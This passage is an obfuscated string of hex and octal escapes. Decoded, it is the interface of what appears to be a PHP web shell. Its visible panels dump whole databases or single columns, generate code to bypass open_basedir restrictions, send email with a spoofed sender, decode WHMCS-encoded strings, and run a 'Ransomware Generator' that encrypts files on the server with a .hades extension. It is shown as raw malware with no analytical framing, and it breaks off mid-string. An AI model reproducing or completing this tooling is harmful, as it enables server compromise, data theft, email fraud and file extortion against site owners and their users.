145\x64\51\x3b\x22\x3e\105\170\164\162\141\x63\164\x20\x61\154\x6c\40\x64\141\164\141\40\146\162\x6f\155\x20\x61\40\x73\160\x65\x63\x69\x66\x69\x63\40\x63\x6f\154\x75\155\x6e\40\151\156\40\141\40\x64\141\x74\141\142\x61\x73\145\40\164\141\142\154\145\56\x3c\57\x70\x3e\74\x64\x69\x76\x20\163\x74\171\x6c\x65\75\x22\x64\x69\x73\160\x6c\141\x79\72\147\162\151\144\x3b\40\147\162\151\144\x2d\164\x65\x6d\x70\154\141\x74\145\55\x63\x6f\154\165\155\x6e\163\72\40\162\145\160\145\141\164\50\x61\x75\164\x6f\55\146\151\x74\54\40\x6d\x69\156\155\x61\x78\x28\62\60\60\160\x78\54\x20\61\146\x72\51\x29\73\x20\147\x61\x70\72\x31\162\x65\155\73\x20\x6d\x61\162\x67\151\156\55\x62\157\164\164\157\x6d\72\x31\162\145\x6d\x3b\42\76\74\x69\156\160\165\x74\40\164\x79\x70\x65\x3d\42\x74\145\170\164\42\40\x69\x64\x3d\x22\x63\157\154\55\144\165\155\x70\x2d\x68\x6f\x73\164\x22\x20\160\154\x61\143\145\150\157\x6c\x64\145\x72\75\x22\x44\x61\x74\141\142\141\x73\145\40\110\157\x73\164\42\40\163\x74\171\x6c\145\75\x22\147\162\x69\144\55\x63\x6f\x6c\x75\155\x6e\x3a\x20\61\40\57\x20\62\x3b\x22\76\74\151\x6e\x70\165\x74\x20\164\x79\x70\x65\75\42\164\145\170\164\x22\40\x69\x64\x3d\x22\143\157\154\55\144\x75\155\x70\55\165\163\145\x72\x22\40\160\x6c\141\x63\145\150\157\154\144\x65\x72\75\x22\125\163\x65\162\156\x61\x6d\x65\x22\x20\x73\x74\x79\x6c\x65\75\42\147\162\x69\144\55\x63\157\x6c\x75\x6d\156\72\x20\62\40\x2f\x20\63\x3b\x22\76\x3c\151\156\160\165\x74\40\164\171\x70\x65\75\x22\x70\141\163\163\x77\157\162\x64\42\40\x69\144\x3d\42\143\x6f\154\55\x64\x75\155\160\55\x70\141\163\x73\x22\x20\160\x6c\141\x63\x65\150\x6f\x6c\x64\145\162\x3d\42\120\141\163\x73\167\157\x72\144\x22\40\163\x74\x79\x6c\145\75\x22\x67\x72\x69\x64\x2d\x63\157\154\165\x6d\x6e\72\x20\x33\x20\x2f\x20\64\73\x22\x3e\x3c\151\156\x70\x75\164\40\x74\x79\x70\145\75\x22\x74\145\x78\164\42\x20\151\144\75\42\143\157\154\x2d\x64\165\155\x70\x2d\x64\142\42\40\160\154\141\143\x65\150\x6f\x6c\x64\145\x72\75\x22\104\141\164\x61\142\x61\x73\145\x20\x4e\x61\x6d\x65\x22\40\x73\164\171\154\x65\75\42\x67\x72\x69\x64\55\x63\x6f\154\x75\x6d\156\72\x20\x31\x20\57\40\62\x3b\42\x3e\x3c\151\156\160\165\x74\40\164\x79\160\x65\75\x22\164\145\170\x74\42\40\151\144\x3d\x22\x63\x6f\154\x2d\144\x75\x6d\160\x2d\x74\x61\142\x6c\145\42\x20\x70\154\141\x63\145\150\157\x6c\144\145\162\x3d\x22\x54\141\142\x6c\145\40\116\x61\x6d\145\42\40\x73\164\171\x6c\145\75\x22\147\x72\x69\x64\55\143\157\154\x75\x6d\156\x3a\x20\x32\40\57\x20\x33\x3b\x22\76\x3c\x69\156\160\165\x74\40\x74\171\160\x65\75\42\164\145\x78\164\x22\40\151\x64\75\42\143\x6f\x6c\55\144\165\x6d\160\x2d\143\157\154\x75\x6d\156\42\40\x70\154\141\x63\145\150\157\x6c\144\145\x72\x3d\42\103\157\154\165\155\x6e\x20\x4e\x61\155\x65\42\40\163\164\x79\154\x65\75\x22\147\x72\x69\144\x2d\143\x6f\x6c\x75\x6d\156\x3a\40\63\x20\x2f\40\x34\x3b\x22\x3e\x3c\x2f\x64\151\x76\x3e\74\x62\x75\x74\164\x6f\156\x20\151\x64\x3d\x22\143\157\154\x2d\144\165\155\x70\55\x62\164\156\x22\x3e\x44\165\155\x70\x20\x43\157\x6c\165\155\156\x3c\57\x62\x75\x74\x74\x6f\156\76\x3c\144\151\x76\40\x69\144\x3d\x22\143\x6f\x6c\x2d\144\x75\x6d\x70\x2d\x72\x65\163\x75\x6c\x74\163\x22\40\x73\x74\171\x6c\x65\75\x22\x6d\x61\162\147\x69\156\x2d\x74\x6f\x70\x3a\61\x72\145\x6d\73\42\76\74\57\144\x69\x76\76\x3c\x2f\144\x69\x76\x3e\x3c\57\x64\151\x76\76\x3c\x2f\x64\x69\166\x3e\12\x9\11\x3c\144\151\166\40\x69\x64\75\42\166\x69\145\x77\x2d\144\141\164\x61\x62\141\163\145\x2d\144\x75\155\160\x65\162\42\x20\143\x6c\141\x73\x73\x3d\x22\166\x69\145\167\x2d\143\x6f\x6e\164\x61\151\156\145\x72\42\x3e\74\x64\x69\166\40\143\x6c\141\x73\163\x3d\42\x63\157\156\x74\x65\x6e\164\x2d\x68\145\141\144\x65\x72\x22\x3e\xf0\237\x92\276\x20\104\141\164\141\142\x61\x73\145\40\104\165\x6d\160\x65\162\x3c\x2f\x64\x69\166\76\x3c\144\151\x76\40\143\x6c\x61\163\x73\75\x22\143\157\x6e\164\145\x6e\164\x2d\x61\162\x65\x61\x22\76\x3c\x64\151\166\40\x63\x6c\141\163\163\75\42\x74\x6f\x6f\154\x2d\x73\x65\x63\164\151\157\x6e\42\x3e\x3c\x68\63\x3e\104\x75\155\x70\40\x45\156\164\151\162\x65\40\x44\x61\164\x61\x62\141\x73\x65\x3c\x2f\x68\63\x3e\x3c\x70\40\x73\164\x79\x6c\x65\x3d\42\x63\x6f\154\x6f\162\72\40\x76\x61\162\50\x2d\x2d\x74\145\x78\164\55\x6d\145\144\51\x3b\x22\x3e\107\145\x6e\145\x72\x61\164\145\40\123\x51\x4c\x20\144\165\155\x70\40\x6f\x66\x20\145\x6e\164\151\x72\x65\x20\x64\141\164\141\142\141\x73\x65\x20\167\x69\x74\x68\x20\141\154\x6c\x20\x74\141\x62\154\x65\163\40\x61\x6e\x64\40\x64\x61\164\141\56\x3c\x2f\160\76\74\x64\151\166\x20\x73\x74\171\154\145\75\42\x64\x69\163\x70\x6c\x61\x79\72\x67\x72\x69\144\x3b\x20\x67\x72\x69\144\55\x74\145\155\x70\154\x61\x74\145\55\143\157\154\165\155\156\x73\x3a\40\162\145\x70\x65\141\x74\x28\141\x75\x74\157\x2d\146\151\x74\54\x20\155\151\x6e\x6d\141\170\50\x32\x30\x30\160\170\x2c\40\x31\x66\162\51\51\x3b\40\x67\141\x70\72\61\x72\x65\x6d\73\40\155\x61\162\147\151\156\55\x62\x6f\x74\164\157\x6d\x3a\x31\162\145\155\73\42\76\74\x69\156\x70\165\164\x20\164\171\x70\x65\x3d\x22\x74\145\x78\164\42\40\x69\144\x3d\x22\144\x62\x2d\x64\x75\x6d\160\x2d\x68\157\x73\164\42\x20\160\154\x61\143\x65\150\x6f\154\144\145\x72\x3d\42\104\x61\164\x61\142\141\x73\145\40\x48\157\163\x74\42\40\x73\x74\171\154\x65\x3d\42\147\162\151\x64\x2d\143\157\154\165\155\x6e\72\x20\x31\x20\57\40\x32\73\42\76\x3c\x69\156\x70\x75\x74\40\164\x79\160\145\x3d\42\x74\x65\x78\164\x22\x20\x69\x64\75\x22\144\142\55\x64\x75\x6d\x70\55\165\163\145\162\x22\40\160\154\141\x63\x65\x68\x6f\x6c\x64\x65\x72\x3d\42\125\x73\x65\x72\x6e\141\155\x65\x22\40\163\164\171\154\x65\75\42\147\x72\x69\144\55\x63\x6f\x6c\x75\155\x6e\x3a\x20\62\x20\57\40\x33\x3b\42\x3e\x3c\151\x6e\160\165\x74\x20\164\x79\x70\x65\x3d\42\x70\141\163\163\x77\157\162\x64\42\40\151\x64\x3d\x22\144\142\55\x64\x75\155\160\x2d\160\141\x73\x73\x22\x20\x70\154\141\x63\145\x68\x6f\154\144\x65\x72\75\42\x50\141\x73\x73\x77\157\162\x64\42\x20\x73\164\171\x6c\x65\x3d\42\x67\162\151\144\x2d\143\157\154\165\x6d\x6e\72\x20\x33\x20\57\x20\x34\73\x22\76\74\x69\x6e\x70\165\164\x20\164\171\160\145\x3d\42\x74\x65\x78\164\x22\40\151\x64\x3d\x22\144\x62\55\x64\165\155\x70\55\144\142\42\x20\160\154\x61\143\145\x68\157\x6c\144\145\x72\75\42\104\141\164\x61\x62\141\163\145\x20\x4e\141\155\x65\x22\40\x73\164\171\x6c\x65\75\42\147\x72\151\x64\x2d\143\x6f\154\x75\x6d\x6e\x3a\40\61\40\x2f\40\55\61\73\42\x3e\x3c\x2f\x64\x69\x76\x3e\x3c\x62\x75\164\x74\157\156\x20\x69\144\75\42\144\x62\x2d\144\165\x6d\x70\x2d\x62\164\x6e\x22\x3e\104\165\155\160\40\104\141\x74\x61\142\x61\x73\145\x3c\x2f\x62\165\164\x74\x6f\x6e\76\74\x64\151\166\40\151\144\x3d\x22\144\x62\x2d\x64\165\x6d\160\55\x72\145\x73\x75\154\x74\x73\42\40\x73\164\171\x6c\x65\75\42\155\141\162\x67\x69\x6e\55\164\157\x70\x3a\x31\162\x65\x6d\x3b\x22\76\74\x2f\x64\151\x76\76\x3c\57\x64\151\x76\x3e\74\x2f\144\151\x76\76\x3c\57\144\x69\166\x3e\12\x9\x9\74\144\151\166\40\151\144\75\42\166\x69\x65\x77\x2d\x6f\160\145\x6e\55\x62\x61\163\x65\x64\x69\162\x22\x20\x63\x6c\141\x73\x73\75\x22\x76\x69\x65\x77\x2d\x63\x6f\x6e\164\141\x69\x6e\145\162\x22\76\x3c\x64\151\x76\40\x63\x6c\141\163\x73\75\42\143\157\x6e\164\x65\156\x74\x2d\150\145\141\144\145\162\42\76\360\x9f\224\x93\40\117\x70\145\x6e\x20\102\x61\x73\x65\104\151\162\40\x42\x79\160\141\x73\163\x3c\57\x64\x69\166\x3e\74\144\151\x76\40\x63\154\x61\x73\163\x3d\x22\143\x6f\x6e\164\145\x6e\x74\x2d\x61\x72\x65\x61\x22\76\x3c\x64\x69\166\x20\143\x6c\141\163\x73\x3d\x22\164\157\x6f\154\x2d\x73\145\x63\164\x69\157\156\x22\x3e\74\x68\x33\76\x4f\x70\145\156\40\102\141\x73\x65\104\151\x72\40\102\171\160\x61\163\x73\40\x4d\145\x74\x68\157\x64\163\x3c\57\150\63\76\x3c\x70\40\x73\x74\171\x6c\x65\75\42\x63\157\x6c\157\162\72\x20\x76\141\x72\50\55\x2d\164\x65\170\164\x2d\x6d\x65\144\x29\73\x22\76\107\x65\x6e\x65\162\141\164\145\40\120\x48\120\40\143\x6f\x64\x65\x20\x74\x6f\x20\x62\171\x70\141\x73\163\40\157\x70\x65\x6e\137\142\141\x73\145\144\x69\162\40\x72\x65\x73\164\x72\151\x63\164\151\x6f\156\x73\56\x3c\x2f\x70\76\x3c\142\165\x74\164\x6f\156\x20\x69\x64\75\x22\142\141\163\145\144\151\162\55\x67\145\x6e\145\162\141\x74\x65\55\x62\164\x6e\x22\76\107\x65\x6e\x65\162\141\x74\145\x20\x42\x79\160\x61\x73\x73\40\x4d\x65\x74\x68\157\x64\163\74\x2f\x62\x75\x74\164\157\156\x3e\x3c\x64\151\x76\40\x69\x64\x3d\42\142\x61\x73\145\x64\151\x72\55\x72\x65\x73\x75\154\164\x73\42\x20\x73\x74\x79\154\x65\x3d\42\155\141\162\x67\x69\156\55\x74\157\160\x3a\x31\162\x65\x6d\73\42\x3e\74\x2f\x64\x69\166\x3e\x3c\x2f\144\151\x76\76\x3c\57\144\151\x76\x3e\74\x2f\x64\x69\x76\76\12\11\11\x3c\x64\151\x76\40\151\x64\75\x22\166\x69\145\x77\x2d\x66\141\x6b\x65\55\x6d\141\x69\x6c\42\40\x63\154\x61\x73\x73\75\42\166\151\x65\167\55\143\157\156\164\141\x69\x6e\145\x72\x22\x3e\74\144\151\x76\x20\x63\154\141\x73\x73\75\x22\x63\x6f\156\x74\x65\x6e\164\x2d\150\x65\141\x64\x65\x72\x22\x3e\360\x9f\223\xa7\40\x46\141\x6b\x65\x20\x4d\x61\151\154\74\x2f\144\151\x76\76\74\x64\x69\x76\x20\x63\154\x61\163\x73\x3d\x22\x63\157\x6e\164\145\156\x74\55\141\162\x65\x61\x22\76\x3c\x64\151\x76\x20\143\x6c\x61\163\x73\75\42\x74\x6f\157\x6c\x2d\x73\145\143\x74\x69\x6f\x6e\42\76\74\x68\x33\x3e\x53\145\156\144\x20\106\141\153\145\40\x45\x6d\141\151\154\x3c\x2f\150\x33\76\74\160\40\x73\x74\x79\x6c\145\75\42\x63\x6f\x6c\x6f\162\x3a\x20\166\x61\x72\50\x2d\x2d\x74\145\170\164\x2d\x6d\x65\x64\51\x3b\42\x3e\x53\145\x6e\x64\40\x65\155\141\x69\154\40\x77\151\x74\x68\x20\143\165\x73\x74\157\155\40\150\145\x61\x64\x65\162\x73\x20\141\x6e\x64\x20\163\160\157\157\146\x65\144\x20\163\145\x6e\144\x65\162\x20\141\x64\144\x72\145\163\163\56\x3c\57\x70\x3e\x3c\x64\x69\x76\x20\x73\x74\x79\154\145\x3d\42\x64\x69\163\x70\154\141\x79\x3a\147\x72\x69\x64\73\40\x67\x72\x69\144\55\164\145\155\x70\x6c\x61\x74\145\x2d\x63\x6f\x6c\165\155\x6e\163\x3a\40\x72\x65\x70\145\141\x74\x28\141\x75\164\x6f\55\x66\x69\164\x2c\40\x6d\151\x6e\155\x61\x78\x28\62\x30\x30\160\170\54\40\61\x66\162\51\x29\73\40\x67\141\160\72\x31\x72\x65\155\73\x20\x6d\141\162\147\151\156\x2d\142\x6f\x74\x74\157\x6d\72\x31\x72\x65\155\x3b\42\76\x3c\x69\156\x70\x75\x74\40\x74\x79\160\x65\x3d\x22\164\145\x78\164\42\40\151\x64\x3d\x22\x66\141\153\145\x2d\155\x61\x69\154\55\164\157\x22\x20\160\x6c\141\x63\x65\150\157\154\x64\145\162\x3d\x22\x54\x6f\x20\50\162\x65\143\x69\x70\151\x65\156\164\51\x22\x20\x73\x74\171\x6c\145\75\42\147\x72\151\x64\x2d\x63\x6f\154\165\155\156\72\40\x31\x20\57\40\x2d\x31\73\x22\x3e\x3c\x69\x6e\160\x75\164\x20\x74\x79\160\145\x3d\42\164\145\170\x74\42\x20\151\144\75\x22\146\x61\153\x65\55\155\x61\x69\x6c\x2d\146\162\157\155\x22\x20\160\x6c\141\x63\145\150\x6f\x6c\144\145\x72\75\x22\x46\162\157\155\x20\50\x73\145\x6e\144\145\162\51\x22\40\x73\x74\x79\154\145\75\42\147\162\x69\x64\55\x63\157\154\x75\x6d\156\x3a\x20\x31\40\x2f\x20\x2d\x31\x3b\42\x3e\74\x69\156\x70\x75\164\x20\164\x79\160\x65\75\42\164\x65\x78\164\x22\40\x69\x64\x3d\x22\146\141\153\145\55\x6d\141\x69\154\x2d\163\x75\142\x6a\x65\x63\164\42\x20\160\x6c\x61\143\145\x68\157\154\x64\x65\x72\75\42\123\x75\142\152\145\143\x74\x22\x20\163\x74\171\x6c\x65\75\42\147\x72\151\144\x2d\143\157\154\165\x6d\156\72\40\61\x20\x2f\x20\55\61\73\x22\x3e\74\164\x65\170\x74\141\162\x65\141\x20\x69\x64\75\42\146\141\x6b\x65\55\x6d\141\x69\x6c\55\155\145\163\x73\x61\147\145\x22\x20\160\x6c\x61\x63\x65\x68\x6f\x6c\x64\x65\x72\75\42\x4d\145\x73\x73\x61\147\x65\x20\x62\157\144\171\x22\x20\x73\x74\171\x6c\x65\75\42\x67\x72\x69\x64\x2d\143\157\x6c\165\x6d\156\x3a\x20\61\40\57\40\55\x31\73\40\x6d\151\x6e\55\x68\145\x69\x67\150\x74\x3a\61\x35\60\160\170\73\x22\x3e\x3c\x2f\164\x65\x78\x74\141\x72\145\x61\x3e\x3c\x74\145\170\x74\141\x72\x65\x61\x20\x69\x64\75\x22\x66\141\x6b\x65\55\155\141\x69\154\55\x68\x65\141\144\145\162\x73\x22\40\160\154\141\143\x65\x68\x6f\x6c\144\x65\x72\75\x22\101\144\x64\151\x74\151\x6f\x6e\x61\154\x20\150\145\x61\x64\145\162\163\40\50\x6f\x70\164\x69\157\156\x61\x6c\51\x22\40\163\x74\171\154\x65\x3d\42\147\x72\x69\144\55\x63\157\154\x75\x6d\x6e\72\x20\x31\40\x2f\40\55\61\x3b\x20\x6d\151\x6e\55\x68\x65\151\x67\150\x74\x3a\61\x30\x30\160\170\x3b\x20\x66\x6f\156\164\x2d\163\x69\x7a\x65\72\x30\56\70\x35\162\x65\155\73\x22\76\74\57\x74\x65\170\x74\x61\162\x65\141\x3e\x3c\57\144\x69\x76\x3e\74\142\x75\164\164\x6f\x6e\40\151\x64\x3d\42\x66\141\x6b\145\55\x6d\x61\x69\x6c\x2d\142\x74\x6e\x22\40\x63\154\141\163\163\75\42\144\141\x6e\147\x65\x72\55\142\164\156\42\x3e\x53\x65\x6e\144\40\105\155\x61\151\x6c\74\57\x62\165\164\x74\x6f\x6e\x3e\x3c\x64\x69\166\40\151\144\75\x22\146\141\x6b\x65\x2d\x6d\x61\151\154\55\x72\145\x73\x75\154\x74\163\x22\40\x73\164\171\x6c\145\75\x22\155\x61\x72\147\151\156\x2d\164\x6f\160\x3a\x31\162\145\155\x3b\x22\x3e\74\x2f\x64\151\x76\x3e\x3c\57\144\x69\166\76\x3c\x2f\x64\x69\x76\x3e\74\57\x64\x69\166\76\xa\x9\x9\x3c\x64\151\x76\40\151\x64\75\42\166\x69\145\167\55\x77\x68\x6d\x63\x73\55\144\145\143\157\144\x65\x72\x22\x20\x63\154\x61\x73\163\75\x22\166\151\x65\x77\55\x63\157\156\164\141\151\x6e\x65\x72\x22\x3e\74\x64\151\x76\40\x63\x6c\x61\163\163\x3d\x22\143\157\156\x74\145\x6e\x74\55\150\x65\141\x64\145\x72\x22\x3e\360\x9f\x94\220\x20\x57\x48\115\x43\x53\40\x44\145\x63\x6f\144\145\x72\74\x2f\144\x69\x76\76\74\144\151\x76\40\143\x6c\x61\x73\x73\x3d\42\x63\x6f\156\x74\x65\156\164\55\x61\x72\145\141\x22\x3e\x3c\144\x69\x76\40\143\154\x61\x73\163\x3d\42\164\x6f\x6f\154\x2d\163\x65\143\164\x69\x6f\x6e\x22\76\74\x68\x33\x3e\x44\x65\143\157\x64\145\x20\127\x48\x4d\x43\123\x20\x45\156\143\157\144\145\144\40\x53\164\162\x69\x6e\147\x73\74\x2f\x68\63\x3e\74\x70\x20\163\164\171\x6c\x65\x3d\x22\143\x6f\154\157\162\72\40\166\141\162\50\x2d\x2d\164\x65\x78\x74\55\x6d\145\144\x29\x3b\x22\x3e\x44\145\x63\x6f\x64\x65\x20\x62\x61\x73\x65\x36\64\x2c\x20\150\x65\170\x2c\40\157\x72\x20\147\172\x69\156\146\x6c\x61\164\x65\x20\x65\x6e\143\x6f\x64\145\x64\40\163\164\x72\151\x6e\147\x73\40\143\157\x6d\155\x6f\x6e\154\171\x20\x75\x73\x65\x64\40\151\x6e\x20\x57\110\x4d\x43\x53\x2e\x3c\57\160\x3e\74\144\151\x76\40\x73\x74\171\154\x65\x3d\42\144\x69\x73\x70\x6c\x61\171\72\x67\x72\151\x64\73\x20\147\162\151\x64\x2d\x74\x65\x6d\160\154\x61\164\145\x2d\143\x6f\154\165\x6d\156\x73\x3a\x20\162\x65\x70\x65\x61\x74\x28\141\x75\x74\157\x2d\146\x69\164\x2c\40\x6d\x69\x6e\155\141\x78\50\x32\60\x30\x70\x78\x2c\40\61\x66\162\51\x29\x3b\x20\x67\141\x70\x3a\61\x72\145\x6d\x3b\x20\x6d\x61\162\147\151\156\55\x62\157\164\164\157\155\x3a\61\162\145\155\x3b\42\x3e\x3c\164\145\170\x74\141\162\145\141\40\x69\x64\75\42\x77\150\x6d\143\163\55\x65\x6e\x63\x6f\x64\145\144\42\x20\x70\154\141\143\145\150\157\x6c\x64\145\x72\x3d\42\120\x61\x73\x74\145\x20\x65\156\143\x6f\x64\x65\x64\x20\163\x74\x72\x69\156\147\x20\x68\x65\x72\145\x2e\56\x2e\x22\x20\x73\164\171\x6c\x65\75\42\x67\x72\x69\144\x2d\143\x6f\154\165\155\156\x3a\40\x31\40\57\40\x2d\61\x3b\40\155\x69\x6e\x2d\x68\x65\x69\147\150\x74\x3a\62\x30\60\x70\170\x3b\x20\146\157\x6e\164\55\146\x61\x6d\151\x6c\x79\x3a\x27\x43\x6f\165\162\151\145\162\x20\116\x65\x77\x27\54\x6d\x6f\x6e\157\163\x70\141\x63\x65\73\40\146\157\156\164\x2d\163\x69\172\145\x3a\61\62\x70\x78\x3b\x22\76\x3c\57\164\x65\170\x74\141\162\x65\x61\76\x3c\x2f\x64\151\x76\76\x3c\142\165\x74\x74\157\156\x20\151\x64\75\42\x77\150\155\x63\x73\x2d\144\x65\x63\157\144\145\55\x62\x74\156\x22\76\104\145\x63\x6f\x64\145\74\x2f\142\165\164\x74\x6f\156\76\74\144\151\x76\x20\x69\144\75\x22\x77\x68\x6d\x63\163\55\x72\145\x73\x75\154\x74\163\x22\40\163\x74\x79\x6c\145\75\42\x6d\141\x72\147\151\156\x2d\164\x6f\160\72\61\162\145\x6d\x3b\x22\x3e\x3c\x2f\x64\x69\x76\x3e\74\57\144\151\x76\76\74\x2f\x64\151\166\76\74\57\x64\151\x76\76\xa\x9\11\x3c\144\151\166\x20\151\x64\75\42\x76\x69\145\167\55\x72\141\156\163\157\155\55\143\x72\x65\x61\x74\157\162\x22\x20\x63\x6c\x61\163\x73\x3d\42\x76\151\x65\167\55\143\157\x6e\164\141\151\x6e\x65\162\x22\76\x3c\144\151\166\x20\x63\x6c\141\x73\x73\x3d\42\143\x6f\x6e\x74\145\x6e\164\55\150\x65\141\x64\x65\x72\42\x3e\xf0\237\222\x80\40\x52\141\156\163\157\155\x77\141\162\x65\40\107\x65\156\145\x72\x61\x74\157\x72\74\x2f\144\x69\x76\x3e\74\144\151\166\40\143\154\141\163\163\x3d\42\x63\157\156\164\145\x6e\x74\x2d\x61\162\x65\x61\x22\76\x3c\144\151\x76\40\x63\x6c\x61\163\x73\75\x22\x74\141\142\163\42\x3e\74\x73\160\141\156\40\x63\154\x61\x73\163\75\42\164\x61\142\55\154\151\156\x6b\40\141\143\x74\x69\x76\145\42\40\x64\x61\164\x61\55\164\141\142\75\x22\145\156\x63\x72\171\160\164\x22\x3e\x45\x6e\x63\162\x79\x70\164\x20\x46\151\154\x65\x73\x3c\x2f\x73\x70\141\156\76\74\163\160\141\156\40\x63\x6c\141\163\x73\x3d\42\x74\x61\x62\55\x6c\x69\x6e\153\x22\40\x64\x61\x74\x61\55\164\141\142\x3d\x22\x64\x65\x63\162\x79\160\x74\x22\76\104\145\x63\162\171\x70\x74\40\x46\151\154\145\x3c\x2f\x73\160\x61\156\76\x3c\x2f\x64\x69\x76\x3e\74\144\151\x76\40\x69\x64\75\42\164\141\142\55\x65\x6e\x63\x72\171\x70\x74\x22\40\143\x6c\141\163\x73\75\42\164\141\142\55\x63\157\x6e\x74\x65\x6e\x74\40\141\x63\x74\x69\166\145\42\76\74\x64\151\166\40\143\x6c\141\163\163\x3d\42\x74\157\157\154\55\x73\x65\x63\164\151\157\156\x22\76\x3c\150\x33\76\106\x69\x6c\x65\x20\x53\x65\x6c\x65\143\x74\x69\157\156\x3c\x2f\150\x33\x3e\x3c\160\x20\x73\164\171\x6c\145\75\42\x63\157\154\157\162\x3a\40\166\x61\x72\x28\55\55\x74\x65\170\164\x2d\x6d\145\x64\51\x3b\42\x3e\123\x65\154\145\x63\x74\x20\146\x69\x6c\145\163\40\164\157\x20\x65\156\x63\162\x79\160\164\x20\165\x73\151\156\x67\x20\110\x41\x44\105\x53\x20\155\x75\154\x74\151\55\154\x61\x79\x65\162\40\x65\156\143\x72\x79\160\x74\x69\157\x6e\x2e\x20\x46\x69\x6c\x65\x73\40\167\151\154\154\x20\x62\x65\40\145\156\143\162\171\160\164\x65\144\40\x77\151\164\150\40\56\x68\x61\x64\145\x73\40\x65\x78\164\x65\x6e\163\151\157\x6e\x2e\x3c\x2f\x70\76\x3c\144\x69\166\x20\x73\x74\x79\154\x65\75\42\155\x61\x72\147\151\x6e\x2d\142\157\164\164\x6f\x6d\x3a\61\162\x65\x6d\73\x22\76\x3c\x68\x34\x3e\115\145\x74\x68\x6f\144\40\61\x3a\40\x53\x65\154\145\143\x74\x20\106\x69\x6c\x65\x73\x20\104\x69\x72\x65\x63\x74\x6c\x79\x3c\57\x68\x34\76\x3c\144\151\x76\x20\163\164\x79\x6c\145\75\42\144\x69\x73\x70\154\141\x79\x3a\146\154\145\170\73\40\147\x61\160\72\61\x72\x65\155\73\x20\155\141\x72\x67\x69\156\55\x62\x6f\x74\164\x6f\x6d\x3a\x31\x72\x65\x6d\x3b\42\76\74\x69\156\x70\x75\164\x20\164\171\160\x65\75\42\164\145\x78\x74\42\x20\x69\x64\75\42\162\141\156\163\157\x6d\55\x62\x72\x6f\x77\163\x65\55\x70\141\x74\x68\42\40\x70\154\141\143\145\150\157\154\144\x65\162\x3d\42\x42\x72\157\167\x73\x65\40\x70\x61\164\x68\x20\x28\145\x2e\x67\x2e\54\40\x2f\x76\141\x72\x2f\x77\167\x77\x29\x22\40\163\164\x79\154\x65\75\x22\146\154\x65\x78\x3a\61\73\42\x3e\x3c\x62\165\164\x74\x6f\156\x20\x69\x64\75\x22\x72\x61\156\x73\157\155\x2d\x62\x72\x6f\167\x73\x65\55\142\164\x6e\42\76\x42\162\157\x77\x73\x65\40\106\x69\x6c\145\163\x3c\57\142\165\164\164\x6f\156\x3e\x3c\57\x64\x69\x76\x3e\x3c\x64\151\x76\40\x69\144\75\42\x72\141\156\x73\x6f\x6d\x2d\x66\x69\x6c\x65\x2d\x73\145\154\x65\143\x74\157\x72\x22\40\x73\x74\x79\154\x65\x3d\42\155\141\x78\55\150\x65\151\147\x68\164\72\63\60\x30\x70\x78\73\40\x6f\x76\145\162\146\x6c\x6f\x77\x2d\171\x3a\x61\x75\x74\x6f\73\x20\x62\157\162\144\145\x72\x3a\61\x70\170\40\163\157\x6c\151\x64\x20\166\141\162\50\55\x2d\142\x6f\162\x64\145\162\x2d\143\157\154\157\x72\x29\73\40\142\157\162\144\x65\x72\55\162\141\x64\x69\165\163\72\66\x70\x78\x3b\x20\160\141\x64\x64\151\x6e\147\72\61\162\x65\x6d\73\40\142\x61\x63\x6b\147\162\157\x75\156\144\72\166\x61\x72\x28\x2d\x2d\142\147\55\144\x61\162\153\51\73\x20\x6d\x61\162\147\x69\156\55\x62\x6f\164\164\x6f\155\x3a\61\x72\145\x6d\x3b\42\x3e\x3c\160\40\163\x74\171\154\145\75\42\143\157\154\x6f\162\x3a\166\141\162\x28\55\x2d\x74\x65\170\x74\x2d\155\145\144\x29\x3b\x20\x74\x65\170\164\55\141\x6c\x69\147\x6e\x3a\x63\145\x6e\x74\145\162\73\x22\x3e\x43\x6c\x69\143\153\40\42\102\162\157\167\x73\x65\x20\x46\x69\x6c\x65\x73\x22\40\x74\x6f\x20\x73\145\x6c\x65\143\164\40\x66\151\x6c\145\163\74\x2f\x70\76\74\x2f\144\x69\x76\76\74\57\144\x69\166\x3e\x3c\144\x69\166\40\x73\164\171\x6c\145\75\x22\155\141\162\x67\151\156\x2d\142\x6f\x74\x74\x6f\x6d\x3a\61\x72\145\155\73\x22\x3e\x3c\x68\64\76\x4d\145\164\x68\157\x64\40\62\72\x20\x45\156\143\162\171\x70\x74\x20\x62\x79\40\105\170\x74\x65\x6e\163\x69\157\x6e\74\57\150\x34\x3e\74\x64\151\x76\x20\x73\164\x79\154\x65\x3d\x22\x64\x69\163\x70\x6c\141\x79\72\x67\x72\151\144\x3b\x20\x67\162\151\144\x2d\x74\x65\x6d\x70\154\141\x74\x65\x2d\143\157\x6c\x75\155\156\163\x3a\40\x72\x65\x70\145\x61\x74\50\x61\x75\x74\x6f\x2d\146\x69\x74\x2c\x20\x6d\x69\156\x6d\x61\170\50\62\x30\x30\160\170\x2c\40\61\146\x72\x29\51\x3b\40\x67\141\160\x3a\61\x72\145\x6d\73\x20\x6d\141\162\147\151\156\x2d\x62\157\164\164\157\x6d\x3a\x31\x72\145\155\x3b\42\76\x3c\151\x6e\x70\x75\164\x20\164\171\x70\x65\75\42\x74\145\x78\x74\42\40\151\144\x3d\x22\162\141\x6e\x73\157\x6d\x2d\x65\x78\x74\145\x6e\163\151\x6f\x6e\163\x22\x20\x70\154\141\x63\145\x68\x6f\154\144\145\162\x3d\42\105\170\164\x65\x6e\x73\x69\x6f\x6e\163\x20\x28\x65\x2e\147\56\54\40\x74\170\164\x2c\144\x6f\x63\54\x70\x64\146\51\x22\x20\x73\164\171\154\145\75\42\x67\x72\x69\144\x2d\x63\x6f\154\165\155\x6e\x3a\40\61\40\57\x20\55\61\x3b\x22\76\x3c\151\x6e\x70\165\164\40\164\x79\160\145\75\x22\164\x65\170\164\42\x20\151\x64\x3d\42\162\141\x6e\x73\157\x6d\x2d\163\x65\141\x72\x63\x68\x2d\x70\x61\x74\150\x73\42\x20\x70\x6c\x61\143\x65\150\157\154\144\145\x72\x3d\42\x53\145\x61\162\x63\x68\x20\160\141\x74\150\163\40\50\x63\157\155\155\141\40\163\x65\x70\x61\162\x61\x74\145\x64\x29\42\40\163\x74\x79\x6c\x65\75\42\x67\x72\x69\144\55\x63\157\154\x75\x6d\x6e\x3a\x20\61\x20\x2f\40\55\x31\x3b\42\x3e\74\x2f\x64\151\x76\76\x3c\x2f\144\151\166\76\74\144\151\x76\x20\163\164\171\154\145\x3d\x22\x6d\x61\x72\x67\x69\x6e\55\x62\157\x74\164\157\x6d\72\x31\162\x65\x6d\x3b\x22\x3e\74\x68\64\76\105\156\143\162\x79\x70\164\151\x6f\156\x20\123\x65\x74\x74\x